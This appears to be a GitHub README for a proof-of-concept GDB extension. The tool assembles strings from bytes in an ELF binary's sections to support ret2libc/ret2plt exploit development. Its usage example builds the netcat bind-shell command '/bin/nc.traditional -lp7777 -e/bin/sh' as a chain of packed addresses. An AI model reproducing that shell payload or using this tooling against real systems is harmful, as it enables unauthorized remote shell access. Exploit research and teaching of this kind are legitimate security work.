pageflt / gdb-memstr

Licence: MIT license
Generate arbitrary strings out of contents of ELF sections

gdb-memstr

Description

This is a proof-of-concept GDB extension for assembling arbitrary ASCII strings out of the contents of the address space of an ELF binary.

It can be handy when developing ret2libc/ret2plt attacks in which the user-supplied data is not located at a fixed or predictable address. In that case the arguments for the libc function have to be constructed on the fly by chaining calls to functions such as memcpy/strcpy/strncpy/sprintf/snprintf, and every byte of the string has to be sourced from an address that already exists in the binary's mapped sections.

Installation

Use the source, Luke:

(gdb) source /path/to/memstr.py 

Usage

$ gdb ./vuln
(gdb) break main
Breakpoint 1 at 0x400587
(gdb) run
Starting program: /home/max/Code/testbed/vuln 
(gdb) memstr "/bin/nc.traditional -lp7777 -e/bin/sh" text
STR = [
    struct.pack('<Q', 0x4015d8),    # /
    struct.pack('<Q', 0x4011ce),    # b
    struct.pack('<Q', 0x400b5a),    # i
    struct.pack('<Q', 0x401fee),    # n
    struct.pack('<Q', 0x4015d8),    # /
    struct.pack('<Q', 0x401fee),    # n
    struct.pack('<Q', 0x400635),    # c
    struct.pack('<Q', 0x40067a),    # .
    struct.pack('<Q', 0x4003da),    # t
    struct.pack('<Q', 0x40094b),    # r
    struct.pack('<Q', 0x4011eb),    # a
    struct.pack('<Q', 0x4006f9),    # d
    struct.pack('<Q', 0x400b5a),    # i
    struct.pack('<Q', 0x4003da),    # t
    struct.pack('<Q', 0x400b5a),    # i
    struct.pack('<Q', 0x401077),    # o
    struct.pack('<Q', 0x401fee),    # n
    struct.pack('<Q', 0x4011eb),    # a
    struct.pack('<Q', 0x4008e7),    # l
    struct.pack('<Q', 0x400787),    #  
    struct.pack('<Q', 0x4003f7),    # -
    struct.pack('<Q', 0x4008e7),    # l
    struct.pack('<Q', 0x400597),    # p
    struct.pack('<Q', 0x4003f1),    # 7
    struct.pack('<Q', 0x4003f1),    # 7
    struct.pack('<Q', 0x4003f1),    # 7
    struct.pack('<Q', 0x4003f1),    # 7
    struct.pack('<Q', 0x400787),    #  
    struct.pack('<Q', 0x4003f7),    # -
    struct.pack('<Q', 0x400f37),    # e
    struct.pack('<Q', 0x4015d8),    # /
    struct.pack('<Q', 0x4011ce),    # b
    struct.pack('<Q', 0x400b5a),    # i
    struct.pack('<Q', 0x401fee),    # n
    struct.pack('<Q', 0x4015d8),    # /
    struct.pack('<Q', 0x400519),    # s
    struct.pack('<Q', 0x4007a2),    # h
    struct.pack('<Q', 0x4003b5)     # \0
]

Thanks

Thanks to argp for his input on this.
